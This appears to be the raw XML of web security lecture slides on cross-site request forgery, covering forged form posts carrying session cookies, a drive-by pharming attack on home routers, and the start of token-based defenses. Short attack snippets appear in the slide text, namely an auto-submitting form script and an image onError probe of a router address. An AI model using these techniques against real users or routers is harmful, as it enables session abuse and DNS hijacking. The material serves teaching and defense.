                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           &lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.F.submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(); &lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser sends user auth cookie with request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Transaction will be fulfilled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookie auth is insufficient when side effects occur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6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6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6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Form post with cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81923" name="Picture 12" descr="basic-csrf-black"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="412750" y="1462088"/>
            <a:ext cx="8350250" cy="5395912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="4267200"/>
            <a:ext cx="2590800" cy="2365375"/>
            <a:chOff x="4191000" y="4267200"/>
            <a:chExt cx="2590800" cy="2365375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="6232525"/>
              <a:ext cx="1992313" cy="400050"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="91439" tIns="45719" rIns="91439" bIns="45719">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C">
                      <a:lumMod val="50000"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>User credentials</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4479925" y="4267200"/>
              <a:ext cx="2301875"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40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="5" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="4618038" y="5218112"/>
              <a:ext cx="1485900" cy="542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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4675188" y="4403725"/>
            <a:ext cx="2122487" cy="236538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="82296" tIns="41148" rIns="82296" bIns="41148">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=523FA4cd2E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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Cookieless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> Example:  Home Router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82947" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6248400"/>
            <a:ext cx="2133600" cy="476250"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{837513D6-D2EB-42E0-BD8E-887A70F18540}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82948" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="3352800"/>
            <a:ext cx="1436688" cy="1436688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82949" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="5181600"/>
            <a:ext cx="2436813" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23558" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6094413" y="4800600"/>
            <a:ext cx="165258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Bad web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23559" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4176713" y="1981200"/>
            <a:ext cx="160813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Home router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82952" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1738313" y="2927350"/>
            <a:ext cx="2057400" cy="436563"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23561" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="4781550"/>
            <a:ext cx="727075"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User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23562" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2108200" y="2470150"/>
            <a:ext cx="1978025" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>configure router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82955" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="1828800" y="4953000"/>
            <a:ext cx="3733800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23564" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="1949450" y="3186113"/>
            <a:ext cx="2462213" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82957" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1893888" y="4343400"/>
            <a:ext cx="3668712" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23566" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="781820">
            <a:off x="3046413" y="4371975"/>
            <a:ext cx="1654175"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visit site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23567" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="822181">
            <a:off x="2216150" y="4973638"/>
            <a:ext cx="2932113"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receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23568" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1677988" y="27019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latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23569" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2606675" y="4114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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23570" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1949450"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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82963" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1905000" y="3498850"/>
            <a:ext cx="1981200" cy="406400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23572" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="3521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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82965" name="Picture 2" descr="http://www.usc-b2b.com/UNIQUE/images/L2100001.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect l="21349" t="5804" r="17416" b="8801"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4357688" y="2347913"/>
            <a:ext cx="1038225"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4000" smtClean="0"/>
              <a:t>Attack on Home Router</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1600200"/>
            <a:ext cx="8610600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>50% of home users have broadband router with a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>default or no password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0"/>
              <a:t>Drive-by Pharming attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>:    User visits malicious site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>JavaScript at site scans home network looking for broadband router:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>SOP allows “send only” messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Detect success using onerror:     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>		&lt;IMG   SRC=192.168.0.1   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> = do() &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Once found, login to router and change DNS server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0"/>
              <a:t>Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: “send-only” access sufficient to reprogram router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93189" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6954838" y="1143000"/>
            <a:ext cx="1122362" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>[SRJ’07]</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0243" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Three vulnerabilities we will discuss</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244"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browser request to good web site, using credentials of an innocent victim</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CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Secret Validation Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
